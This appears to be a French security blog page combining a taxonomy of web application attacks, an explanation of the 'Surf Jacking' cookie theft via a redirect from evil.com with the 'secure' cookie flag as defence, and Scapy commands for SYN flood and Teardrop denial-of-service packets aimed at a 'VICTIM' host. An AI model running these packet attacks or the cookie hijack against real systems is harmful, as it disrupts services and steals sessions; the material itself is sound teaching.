• Authentification
  Concerne les attaques qui ciblent le mécanisme d’authentification / validation d’identité
  
  • « Brute Force« 
    L’attaque par force brute est une méthode utilisée pour trouver un mot de passe. Il s’agit de tester, une à une, toutes les combinaisons possibles. Celle-ci peut également être faite par dictionnaire, l’attaquant fournissant alors une liste de mot que le programme réalisant l’attaque pourra alors essayer un à un ou en créant des combinaisons.
  • « Insufficient Authentication« 
    L’insuffisance d’authentification apparait lorsqu’il est possible d’accéder à un contenu restreint sans avoir eu besoin de fournir une authentification.
    Par exemple: un site fournit un accès à un contenu X. Lors de l’accès au site un formulaire demande à l’utilisateur de s’authentifier, mais la connaissance du chemin complet au contenu X permet d’y accéder sans qu’aucun problème d’identification n’apparaisse.
  • « Weak password recovery validation« 
    Cette attaque est basé sur la possibilité à un utilisateur qui a perdu son mot de passe de le récuperer d’une manière triviale, avec par exemple la simple demande de la date de naissance de l’utilisateur.

• Autorisations
  Concerne les attaques qui ont pour but d’élever les privilèges d’un utilisateur
  
  • « Credential/Session prediction« 
    Cette attaque vise à outrepasser l’authentification en prédisant l’identifiant de session.  En analysant le processus de génération d’identifiant de session, l’attaquant pourra être en mesure de forger un identifiant de session valide et ainsi obtenir un accès à l’application.
  • « Insufficient authorization« 
  • « Insufficient session expiration« 
  • « Session fixation« 
• Attaques coté client
  • « Content spoofing« 
  • « Cross-site scripting« 
• Exécution de commandes
  • « Buffer overflow« 
  • « Format String Attack« 
  • « Ldap Injection« 
  • « OS Commanding« 
  • « SQL Injection« 
  • « SSI Injection« 
  • « XPath Injection« 
• Fuite d’informations
  • « Directory Indexing« 
  • « Information Leakage« 
  • « Path Traversal« 
  • « Predictable Ressource Location« 
• Attaques logiques
  • « Abuse of functionnality« 
  • « Denial of Service« 
  • « Insufficient Anti-Automation« 
  • « Insufficient Process Validation« 

Sources:

• http://www.webappsec.org/projects/threat/classes_of_attack.shtml

Requis: pouvoir capturer le traffic envoyé en clair par la cible (wifi…)

Le principe:

- la cible se connecte à un service web sécurisé https://www.mabanque.com
- alors que la cible est logguée, elle se connecte à http://www.evil.com
- evil.com renvoi un 301″Move permanently », redirigeant le naviguateur de la cible vers http://www.mabanque.com
- la cible ouvre une connection en clair vers mabanque.com, envoyant le cookie..

Pour prévenir qu’un cookie délivré par HTTPS soit renvoyé dans une session non chiffré:

Le cookie doit être marqué comme ‘secure’ (RFC2109).

Example:

Set-Cookie:Session:1234567890;Path=/;secure

Un plugin Firefox pour détecter les sites vulnérables à cette attaque: https://addons.mozilla.org/fr/firefox/addon/8454
Source:
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf

Contenu de la présentation:

Dénis de service:

1. Tcp Syn
2. Land
3. Teardrop
4. Smurf
5. Ping de la mort

Vol de session:

1. Tcp hijacking

* Téléchargement des codes sources des attaques : à venir!

Prérequis : python , dpkt

* Mise en oeuvre des attaques avec Scapy

_ Syn Flood:

>>>p=IP(dst= »VICTIM »,src= »INEXISTANTE STATION »)/TCP(dport=80,sport=range(10,10000),flags=02)
>>>[i for i in p]
>>>srflood(p)

_ Teardrop:

send(IP(dst= »VICTIM », id=42, flags= »MF »)/UDP()/(« X »*10))
send(IP(dst= »VICTIM », id=42, frag=48)/(« X »*116))
send(IP(dst= »VICTIM », id=42, flags= »MF »)/UDP()/(« X »*224))